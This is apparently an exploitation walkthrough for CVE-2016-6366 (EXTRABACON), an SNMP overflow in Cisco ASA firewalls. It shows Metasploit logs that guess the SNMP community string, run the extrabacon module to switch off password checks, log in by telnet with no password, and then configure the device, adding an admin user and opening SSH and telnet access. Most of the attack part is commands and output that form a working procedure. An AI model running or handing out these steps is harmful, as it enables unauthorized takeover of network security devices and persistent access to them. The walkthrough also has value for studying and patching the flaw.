Authors: < nixawk >
A vulnerability in the Simple Network Management Protocol (SNMP) code of Cisco Adaptive Security Appliance (ASA) Software could allow an authenticated, remote attacker to cause a reload of the affected system or to remotely execute code.
The vulnerability is due to a buffer overflow in the affected code area. The vulnerability affects all versions of SNMP (versions 1, 2c, and 3) when enabled on a virtual or physical Cisco ASA device. An attacker could exploit this vulnerability by sending crafted SNMP packets to an SNMP-enabled interface on the affected system. An exploit could allow the attacker to execute arbitrary code and obtain full control of the system or to cause a reload of the affected system. The attacker must know the SNMP community string to exploit this vulnerability.
Note: Only traffic directed to the affected system can be used to exploit this vulnerability. This vulnerability affects systems configured in routed and transparent firewall mode only and in single or multiple context mode. This vulnerability can be triggered by IPv4 traffic only. The attacker requires knowledge of the configured SNMP community string in SNMP version 1 and SNMP version 2c or a valid username and password for SNMP version 3.
Cisco has released software updates that address this vulnerability. Mitigations are listed in the Workarounds section of this advisory.
If you known nothing about the Cisco ASA device, please try to discovery something useful with nmap or custom tools/methods.
If snmp is enabled, we can try to crack the password with metasploit.
msf auxiliary(snmp_login) > set PASSWORD public
PASSWORD => public
msf auxiliary(snmp_login) > set RHOSTS 192.168.206.114
RHOSTS => 192.168.206.114
msf auxiliary(snmp_login) > run
[+] 192.168.206.114:161 - LOGIN SUCCESSFUL: public (Access level: read-write); Proof (sysDescr.0): Cisco Adaptive Security Appliance Version 9.2(1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Now, CVE-2016-6366 can help us exploit remote cisco device.
msf auxiliary(cisco_asa_extrabacon) > show options
Module options (auxiliary/admin/cisco/cisco_asa_extrabacon):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMUNITY public yes SNMP Community String
MODE pass-disable yes Enable or disable the password auth functions (Accepted: pass-disable, pass-enable)
RETRIES 1 yes SNMP Retries
RHOST 192.168.206.114 yes The target address
RPORT 161 yes The target port
TIMEOUT 1 yes SNMP Timeout
msf auxiliary(cisco_asa_extrabacon) > run
[*] Building pass-disable payload for version 9.2(1)...
[*] Sending SNMP payload...
[+] Clean return detected!
[!] Don't forget to run pass-enable after logging in!
[*] Auxiliary module execution completed
If exploit successully, please try to login it with telnet. The attacker can login into the cisco device with no password.
$ telnet 192.168.206.114
ciscoasa> ?
clear Reset functions
enable Turn on privileged commands
exit Exit from the EXEC
help Interactive help for commands
login Log in as a particular user
logout Exit from the EXEC
no Negate a command or set its defaults
ping Send echo messages
quit Exit from the EXEC
show Show running system information
traceroute Trace route to destination
ciscoasa> show version
Cisco Adaptive Security Appliance Software Version 9.2(1)
Device Manager Version 7.2(1)
Compiled on Thu 24-Apr-14 12:14 PDT by builders
System image file is "boot:/asa921-smp-k8.bin"
Config file at boot was "startup-config"
ciscoasa up 2 hours 25 mins
Hardware: ASAv, 2048 MB RAM, CPU Pentium II 2793 MHz,
Internal ATA Compact Flash, 256MB
Slot 1: ATA Compact Flash, 8192MB
BIOS Flash Firmware Hub @ 0x1, 0KB
0: Ext: Management0/0 : address is 000c.29a9.88d6, irq 10
1: Ext: GigabitEthernet0/0 : address is 000c.29a9.88e0, irq 5
2: Ext: GigabitEthernet0/1 : address is 000c.29a9.88ea, irq 9
3: Ext: GigabitEthernet0/2 : address is 000c.29a9.88f4, irq 10
ASAv Platform License State: Unlicensed
*Install -587174176 vCPU ASAv platform license for full functionality.
The Running Activation Key is not valid, using default settings:
Licensed features for this platform:
Virtual CPUs : 0 perpetual
Maximum Physical Interfaces : 10 perpetual
Maximum VLANs : 50 perpetual
Inside Hosts : Unlimited perpetual
Failover : Active/Standby perpetual
Encryption-DES : Enabled perpetual
Encryption-3DES-AES : Enabled perpetual
Security Contexts : 0 perpetual
GTP/GPRS : Disabled perpetual
AnyConnect Premium Peers : 2 perpetual
AnyConnect Essentials : Disabled perpetual
Other VPN Peers : 250 perpetual
Total VPN Peers : 250 perpetual
Shared License : Disabled perpetual
AnyConnect for Mobile : Disabled perpetual
AnyConnect for Cisco VPN Phone : Disabled perpetual
Advanced Endpoint Assessment : Disabled perpetual
UC Phone Proxy Sessions : 2 perpetual
Total UC Proxy Sessions : 2 perpetual
Botnet Traffic Filter : Enabled perpetual
Intercompany Media Engine : Disabled perpetual
Cluster : Disabled perpetual
This platform has an ASAv VPN Premium license.
Serial Number: 9ATJDXTHK3B
Running Permanent Activation Key: 0x00000000 0x00000000 0x00000000 0x00000000 0x00000000
Image type : Release
Key version : A
Configuration last modified by enable_15 at 10:12:25.439 UTC Mon Sep 26 2016
enable can be used to enter cisco config mode. Normally, the password is null.
ciscoasa> help enable
USAGE:
enable [<priv_level>]
DESCRIPTION:
enable Turn on privileged commands
ciscoasa> enable ?
<0-15> Enter optional privilege level (0-15)
<cr>
ciscoasa> enable
Password:
ciscoasa# configure terminal
ciscoasa(config)# ?
aaa Enable, disable, or view user authentication,
authorization and accounting
aaa-server Configure a AAA server group or a AAA server
access-group Bind an access-list to an interface to filter
traffic
access-list Configure an access control element
arp Change or view ARP table, set ARP timeout
value, view statistics
as-path BGP autonomous system path filter
asdm Configure Device Manager
asp Configure ASP parameters
auth-prompt Customize authentication challenge, reject or
acceptance prompt
auto-update Configure Auto Update
banner Configure login/session banners
bgp-community format for BGP community
boot Set system boot parameters
ca Certification authority
call-home Smart Call-Home Configuration
checkheaps Configure checkheap verification intervals
class-map Configure MPF Class Map
clear Clear
client-update Configure and change client update parameters
clock Configure time-of-day clock
cluster Cluster configuration
command-alias Create command alias
community-list Add a community list entry
compression Configure global Compression parameters
configure Configure using various methods
console Serial console functions
coredump Configure Coredump options
crashinfo Enable/Disable writing crashinfo to flash
crypto Configure IPSec, ISAKMP, Certification
authority, key
ctl-file Configure a ctl-file instance
ctl-provider Configure a CTL Provider instance
cts Cisco Trusted Security commands
ddns Configure dynamic DNS update method
dhcp-client Configure parameters for DHCP client operation
dhcpd Configure DHCP Server
dhcprelay Configure DHCP Relay Agent
dns Add DNS functionality to an interface
dns-group Set the global DNS server group
dns-guard Enforce one DNS response per query
domain-name Change domain name
dynamic-access-policy-record Dynamic Access Policy configuration commands
dynamic-filter Configure Dynamic Filter
dynamic-map Configure crypto dynamic map
enable Configure password for the enable command
end Exit from configure mode
established Allow inbound connections based on established
connections
event Configure event manager
exit Exit from config mode
failover Enable/disable failover feature
filter Enable or disable URL, FTP, HTTPS, Java, and
ActiveX filtering
fips FIPS 140-2 compliance information
firewall Switch to router/transparent mode
fixup Add or delete inspection services
flow-export Configure flow information export through
NetFlow
fragment Configure the IP fragment database
ftp Set FTP mode
ftp-map Configure advanced options for FTP inspection
group-delimiter The delimiter for tunnel-group lookup.
group-policy Configure or remove a group policy
gtp-map Configure advanced options for GTP inspection
h225-map Configure advanced options for H225 inspection
help Interactive help for commands
hostname Change host name of the system
hpm Configure TopN host statistics collection
http Configure http server and https related
commands
http-map This command has been deprecated.
icmp Configure access rules for ICMP traffic
imap4s Configure the imap4s service
interface Select an interface to configure
ip Configure IP address pools
ip Configure IP addresses, address pools, IDS, etc
ipsec Configure transform-set, IPSec SA lifetime and
PMTU Aging reset timer
ipv6 Configure IPv6 address pools
ipv6 Global IPv6 configuration commands
ipv6-vpn-addr-assign Global settings for VPN IP address assignment
policy
isakmp Configure ISAKMP options
jumbo-frame Configure jumbo-frame support
key Create various configuration keys
l2tp Configure Global L2TP Parameters
ldap Configure LDAP Mapping
logging Configure logging levels, recipients and other
options
logout Logoff from config mode
mac-address MAC address options
mac-list Create a mac-list to filter based on MAC
address
management-access Configure management access interface
map Configure crypto map
media-termination Configure a media-termination instance
mgcp-map Configure advanced options for MGCP inspection
migrate Migrate IKEv1 configuration to IKEv2/SSL
monitor-interface Enable or disable failover monitoring on a
specific interface
mount Configure a system mount
mroute Configure static multicast routes
mtu Specify MTU(Maximum Transmission Unit) for an
interface
multicast-routing Enable IP multicast
name Associate a name with an IP address
names Enable/Disable IP address to name mapping
nat Associate a network with a pool of global IP
addresses
no Negate a command or set its defaults
ntp Configure NTP
nve Configure an Network Virtulization Endpoint
(NVE)
object Configure an object
object-group Create an object group for use in
'access-list', etc
object-group-search Enables object group search algorithm
pager Control page length for pagination
passwd Change Telnet console access password
password Configure password encryption
password-policy Configure password policy options
phone-proxy Configure a Phone proxy instance
pim Configure Protocol Independent Multicast
policy-list Define IP Policy list
policy-map Configure MPF Parameter Map
pop3s Configure the pop3s service
prefix-list Build a prefix list
priority-queue Enter sub-command mode to set priority-queue
attributes
privilege Configure privilege levels for commands
prompt Configure session prompt display
quit Exit from config mode
quota Configure quotas
regex Define a regular expression
remote-access Configure SNMP trap threshold for VPN
remote-access sessions
route Configure a static route for an interface
route-map Create route-map or enter route-map
configuration mode
router Enable a routing process
same-security-traffic Enable same security level interfaces to
communicate
scansafe Scansafe configuration
service Configure system services
service-interface service-interface for dynamic interface types
service-policy Configure MPF service policy
setup Pre-configure the system
sla IP Service Level Agreement
smtp-server Configure default SMTP server address to be
used for Email
smtps Configure the smtps service
snmp Configure the SNMP options
snmp-map Configure an snmp-map, to control the operation
of the SNMP inspection
snmp-server Modify SNMP engine parameters
ssh Configure SSH options
ssl Configure SSL options
sunrpc-server Create SUNRPC services table
sysopt Set system functional options
tcp-map Configure advanced options for TCP inspection
telnet Add telnet access to system console or set idle
timeout
terminal Set terminal line parameters
tftp-server Configure default TFTP server address and
directory
threat-detection Show threat detection information
time-range Define time range entries
timeout Configure maximum idle times
tls-proxy Configure a TLS proxy instance or the maximum
sessions
track Object tracking configuration commands
tunnel-group Create and manage the database of connection
specific records for IPSec connections
tunnel-group-map Specify policy by which the tunnel-group name
is derived from the content of a certificate.
uc-ime Configure a Cisco Intercompany Media Engine
(UC-IME) instance
url-block Enable URL pending block buffer and long URL
support
url-cache Enable/Disable URL caching
url-server Configure a URL filtering server
user-identity Configure user-identity firewall
username Configure user authentication local database
virtual Configure address for authentication virtual
servers
vnmc Configure VNMC params
vpdn Configure VPDN feature
vpn Configure VPN parameters.
vpn-addr-assign Global settings for VPN IP address assignment
policy
vpn-sessiondb Configure the VPN Session Manager
vpnsetup Configure VPN Setup Commands
vxlan Configure VXLAN system parameters
wccp Web-Cache Coordination Protocol Commands
webvpn Configure the WebVPN service
xlate Configure an xlate option
zonelabs-integrity ZoneLabs integrity Firewall Server
Configuration
ciscoasa(config)# interface ?
configure mode commands/options:
GigabitEthernet GigabitEthernet IEEE 802.3z
Management Management interface
Redundant Redundant Interface
TVI Tenant Virtual Interface
vni VNI Interface
<cr>
ciscoasa(config)# interface GigabitEthernet ?
configure mode commands/options:
<0-0> GigabitEthernet interface number
ciscoasa(config)# interface GigabitEthernet 0/?
configure mode commands/options:
<0-2> GigabitEthernet interface number
ciscoasa(config)# interface GigabitEthernet 0/0
ciscoasa(config-if)# ?
Interface configuration commands:
authentication authentication subcommands
ddns Configure dynamic DNS
default Set a command to its defaults
delay Specify interface throughput delay
description Interface specific description
dhcp Configure parameters for DHCP client
dhcprelay Configure DHCP Relay Agent
duplex Configure duplex operation
exit Exit from interface configuration mode
flowcontrol Configure flowcontrol operation
hello-interval Configures EIGRP-IPv4 hello interval
help Interactive help for interface subcommands
hold-time Configures EIGRP-IPv4 hold time
igmp IGMP interface commands
ip Configure the ip address
ipv6 IPv6 interface subcommands
mac-address Assign MAC address to interface
management-only Dedicate an interface to management. Block thru traffic
mfib Interface Specific MFIB Control
multicast Configure multicast routing
nameif Assign name to interface
no Negate a command or set its defaults
ospf OSPF interface commands
pim PIM interface commands
pppoe Configure parameters for PPPoE client
rip Router Information Protocol
security-level Specify the security level of this interface after this
keyword, Eg: 0, 100 etc. The relative security level between
two interfaces determines the way the Adaptive Security
Algorithm is applied. A lower security_level interface is
outside relative to a higher level interface and equivalent
interfaces are outside to each other
shutdown Shutdown the selected interface
speed Configure speed operation
split-horizon Configures EIGRP-IPv4 split-horizon
summary-address Configures EIGRP-IPv4 summary-address
ciscoasa(config-if)# ip address ?
interface mode commands/options:
Hostname or A.B.C.D Firewall's network interface address
dhcp Keyword to use DHCP to poll for information. Enables the
DHCP client feature on the specified interface
pppoe Keyword to use PPPoE to poll for information. Enables
the PPPoE client feature on the specified interface
ciscoasa(config)# ip address 192.168.206.114 255.255.255.0
ciscoasa(config-if)# no shutdown
ciscoasa(config-if)# exit
ciscoasa(config)# exit
ciscoasa# ping 192.168.206.1
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 192.168.206.1, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 1/2/10 ms
ciscoasa# configure terminal
ciscoasa(config)# snmp-server host inside 192.168.206.1 community 0 public
ciscoasa# configure terminal
ciscoasa(config)# username admin password password
ciscoasa(config)# aaa authentication ssh console LOCAL
ciscoasa(config)# passwd password
ciscoasa(config)# crypto key generate rsa ?
configure mode commands/options:
general-keys Generate a general purpose RSA key pair for signing and
encryption
label Provide a label
modulus Provide number of modulus bits on the command line
noconfirm Specify this keyword to suppress all interactive prompting.
usage-keys Generate seperate RSA key pairs for signing and encryption
<cr>
ciscoasa(config)# crypto key generate rsa modulus ?
configure mode commands/options:
1024 1024 bits
2048 2048 bits
4096 4096 bits
512 512 bits
768 768 bits
ciscoasa(config)# ssh 192.168.206.1 255.255.255.0 inside
ciscoasa(config)# ssh 192.168.206.137 255.255.255.0 inside
ciscoasa(config)# ssh version 2
ciscoasa# configure terminal
ciscoasa(config)# aaa authentication telnet console LOCAL
ciscoasa(config)# telnet 0.0.0.0 0.0.0.0 inside
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160817-asa-snmp
- http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/118075-configure-asa-00.html
- https://github.com/RiskSense-Ops/CVE-2016-6366/
- http://paper.seebug.org/31/